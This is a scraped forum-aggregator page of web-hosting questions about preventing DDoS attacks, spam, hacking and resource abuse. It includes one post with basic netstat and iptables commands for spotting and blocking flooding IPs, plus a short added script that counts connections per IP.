and someone runs script.php, I want to block it from running and show a 406 error.

Now can you tell me how I can write this rule in mod_security 2 with Apache 2?

I use SecRule RESPONSE_BODY "test" but it's not working ...

View Replies!   View Related
How To Prevent Perl From Working
I have a cPanel/Linux server, running Apache as a webserver.

I want to know how I can prevent perl/cgi files from working on all virtual hosts on both apache2/apache1.3!

View Replies!   View Related
What Can I Do To Prevent DDoS Attack
My site was recently under a DDoS attack and was down for a few days; the attack came from Russia, I believe.

The people who did it asked for $800, but of course I didn't pay. My hosting company did the best they could in order to stop the attack but it still lasted a few days and badly hurt my rankings.

I moved my site to a dedicated server, but I don't know what kind of software/hardware I need to install on it in order to prevent more future attacks. The hosting company suggested a few things but I don't know if they are just trying to get more money out of me.

View Replies!   View Related
How To Prevent DNS Flood
Can anyone share tips how to prevent DNS flood on a cPanel and Directadmin server platform on Centos?

View Replies!   View Related
Prevent Directory Listing
I've just made a transition from a VDS to a Dedicated and I'm having problems preventing directory contents from showing. In my previous server whenever I created a directory, it would automatically give a 403 when you tried to access the directory directly in your browser (which is what I want). Now when I set up directories in this new dedicated the contents of the directories display when there is either no index page or if I didn't have an htaccess file preventing it from listing the contents.

So what I'm asking is how did my previous server automatically set up the directories to not display the contents but use the contents and allow access to, say for example, pictures in the directory?

Is there a way I can have Apache automatically do this for me, or do I have to place a blank index page in every directory I create or have to place an htaccess file in every directory I create? How can I protect the contents with a 403 but still allow the contents to be accessed only through the full path?

View Replies!   View Related
My Server Was Hacked -- How To Prevent This
My server was recently hacked and I'm looking ways to secure it in the future. I use the server to host my own websites.

It was hacked to be a spam server. I traced the new files the hackers added to my "upload" directory, which is where my site members upload pics. I had set the directory to chmod 777. Could someone hack that directory solely from its rights being 777?

The site was custom developed in PHP, and looking through it myself, I couldn't find any security issues. But then again, I may not know what exactly to look up.

I would appreciate any general tips to protecting a server, as well as general tactics hackers use to hack a server and PHP site.

View Replies!   View Related
Way To Prevent Iframe Attack
Some sites on my server have had iframe code inserted into their homepage index.php and index.html.
I found this topic has been discussed on WHT for some time but with no solution yet. I found an article to help solve this issue but I lack the knowledge to understand the article.

[url]

View Replies!   View Related
Prevent Download Manager
Download manager software usually splits files into many parts, then downloads them at the same time. Will it make server load higher? If yes, how can I limit the number of parts a file can be split into?

View Replies!   View Related
Prevent Hacking/spamming
Will I depend on my hosting account (SSL) in preventing a hacking/spamming scenario? What do I need to know to prevent hacking/spamming?

How To Prevent Hacker Enter My Host
I want to ask for some tips to protect my blog from hacker attacks. My friends experienced this and I don't want this to happen to me. Can web hosting technical support fix my host server if a hacker breaks in?

How To Prevent DDoS Attacks CentOS
I believe that my site is being DDoSed against, and I'm wondering how I can prevent this from happening.

I'm running CentOS 5.3.

Are there any server-side scripts or PHP scripts that could be used to dynamically block out IPs that are consuming too many resources on the VPS?

Check And Prevent Ddos Attack
While working on different issues, I have seen many clients complaining about DDoS attacks on their servers. So I am posting here some useful commands to check for and prevent DDoS attacks.

First of all, when you see that your site's or server's speed is very slow even though there is not much load on your server, you can guess it might be a DDoS. Then run the 'top' command and see which processes are most numerous; if those are httpd, then run the following commands,
which will show how many active connections your server is currently processing.
netstat -n | grep :80 | wc -l
netstat -n | grep :80 | grep SYN |wc -l

The first command will show the number of active connections that are open to your server. The number of active connections from the first command is going to vary widely, but if you are much above 500 you are probably having problems. If the second command is over 100, you are having trouble with a SYN attack.

netstat -anp | grep -E 'tcp|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n

That will list the IPs taking the largest number of connections to a server.

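Use the following command to block an IP with iptables on the server

# -I inserts at position 1 (-A takes no rule number); use DROP or REJECT as the target
iptables -I INPUT 1 -s IPADDRESS -j DROP

# save first: a restart reloads the saved rule set and would discard an unsaved rule
service iptables save

service iptables restart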

--------OR---------------
You can place IPs which you want to block in hosts.deny

vi /etc/hosts.deny

httpd: IP

write and quit

---------------------------

Then kill all httpd connections and restart the httpd service using the following commands

killall -KILL httpd

service httpd startssl

-----------------------------------

These are all the steps to check and prevent DDoS on your server.
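
An added example, not part of the original post: the per-IP tally from the post, restricted to connections whose local port is the web port and tolerant of IPv4-mapped IPv6 addresses, run over a constructed netstat sample. The function names, the documentation-range addresses and the limit of 3 are assumptions for illustration.

```shell
#!/bin/sh
# Constructed sample of `netstat -ant` output (documentation addresses, not real traffic).
sample_netstat() {
cat <<'EOF'
Proto Recv-Q Send-Q Local Address           Foreign Address           State
tcp        0      0 0.0.0.0:80              0.0.0.0:*                 LISTEN
tcp        0      0 192.0.2.10:80           198.51.100.7:40112        ESTABLISHED
tcp        0      0 192.0.2.10:80           198.51.100.7:40113        ESTABLISHED
tcp        0      0 192.0.2.10:80           198.51.100.7:40114        SYN_RECV
tcp6       0      0 ::ffff:192.0.2.10:80    ::ffff:198.51.100.7:40115 ESTABLISHED
tcp        0      0 192.0.2.10:80           203.0.113.5:51000         ESTABLISHED
tcp        0      0 192.0.2.10:22           203.0.113.5:51001         ESTABLISHED
tcp        0      0 192.0.2.10:45000        203.0.113.9:80            ESTABLISHED
EOF
}

# per_ip_counts PORT: netstat output on stdin -> "TOTAL SYN_RECV IP", busiest first.
per_ip_counts() {
  awk -v port="$1" '
    $1 !~ /^tcp/ || $6 == "LISTEN" { next }   # skip header, UDP and listeners
    {
      laddr = $4; raddr = $5
      if (laddr !~ (":" port "$")) next       # inbound to our port only, not :8080 or outbound
      sub(/:[0-9]+$/, "", raddr)              # strip the port after the LAST colon
      sub(/^::ffff:/, "", raddr)              # unwrap IPv4-mapped IPv6 peers
      total[raddr]++
      if ($6 == "SYN_RECV") syn[raddr]++
    }
    END { for (ip in total) printf "%d %d %s\n", total[ip], syn[ip] + 0, ip }
  ' | sort -rn
}

# over_limit PORT LIMIT: print only the peers holding more than LIMIT connections.
over_limit() {
  per_ip_counts "$1" | awk -v limit="$2" '$1 > limit { print $3 }'
}

# Demo on the constructed sample; on a live host feed it `netstat -ant` instead.
sample_netstat | per_ip_counts 80
echo "over limit of 3: $(sample_netstat | over_limit 80 3)"
```

Review the candidates that `over_limit` prints before blocking any of them, since proxies and NAT gateways legitimately hold many connections from one address.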

How Can I Prevent Spam Email To Be Sent Out By My Servers?
How can I prevent spam email from being sent out by my servers?

How can I restrict how many emails per hour can be sent based on domain name? I know HostGator and HostMonster have that type of configuration.

How To Prevent Staff Steal Our Site
This became a concern for me when we hired a company/people to handle our server, because our knowledge of managing a dedicated server is low and we run a big site on that server.

Does anybody know any tips on how to prevent staff from a managed service from stealing our site, even if they have been trusted and have handled hundreds or thousands of servers? As we know, when we hire them for fully managed service, they have our root access.

How To Prevent Email To Root Account
I'm running a web hosting server under Linux with sendmail as the mail server.

The problem is that many spammers send mails directly to the root account by using one of the existing pseudo accounts like "apache, uucp, root, ...". In a default sendmail installation, apache, uucp, root are defined as aliases and point to root. I do virtual hosting so I accept mail for several domains. If a spammer sends mail to root@anotherdomain.com, the spam will also arrive in the root account. If I define a bounce-all for my main domain, I have problems because root@mymaindomain.com and apache@mymaindomain.com do not exist anymore. This results in "user unknown" when apache or root try to send a mail out.

So, how do I prevent spammers from sending mail directly to the root account? Is it possible to accept only local mail to the root account?

Anyway To Prevent Host Company To Take Your Content
Is it possible to prevent the hosting company from taking your source code and content?

How To Prevent People From Leeching My Bandwidth
There are download links I've provided. I am afraid people might just directly link to them and steal my bandwidth.

How do I prevent it?

How To Prevent Site To Take A Backup From The Cpanel
How can I prevent a site from taking a full backup from his cPanel?

I am sure there is a way to do that from the server.

Prevent .htaccess Override Of Upload_max_filesize Only
I'm having issues with users setting their upload_max_filesize, and post_max_size values in .htaccess in excess of 500M 1000M

As a result their users are uploading and converting some huge files and pegging my CPUs.

Is there a way to allow .htaccess override for all values except upload_max_filesize & post_max_size?

or perhaps there is another solution out there to limit .htaccess by user?

How To Prevent OOM (Out Of Memory) Crashes
I have a colocated server with the following specs:

Intel Core 2 Quad Q6600 2.4Ghz
4GB RAM
400GB SATA Drive

I have a problem every few days: the server keeps hanging up and giving an "Out of Memory" message, and SSH just hangs and doesn't connect. Every time I have to call out a tech to manually reboot it.

Is there a setting I can change to make SSH connect even when it is out of memory, or anything that can prevent it happening?

Reseller Using More Space Than He Is Allowed... How To Prevent That
I went into Reseller center this morning and clicked "View Usage/Stats and Manage (suspend,terminate,etc)" to find out that for that specific reseller:

Disk Space Used in Meg: 6323.02
Disk Space Limit: 4662

How is that possible?

I went back and clicked "Edit Privileges/Nameservers",

Resource Usage Limits | Resource Max Allowed | Overselling Allowed
Disk Space MB*        | 5000                 | NOT CHECKED
Bandwidth MB*         | 200000               | NOT CHECKED
(Sorry if my table is a bit crooked)

My reseller was able to go over the limit I have set up for him. Shouldn't he have a message that he cannot go over the limit, or something preventing him from going over 5000 megs?

How To Prevent Customer From Using PHP Scripts
Is there a way that I can prevent certain customers from using PHP scripts with their account?

For example, I'm planning to offer some free hosting accounts (along with paid ones) but do not plan to allow PHP or Perl scripts with the free accounts as I'm worried about the server being exploited. (That could also happen with paid accounts but less likely.)

Copyright © 2005-08 www.BigResource.com, All rights reserved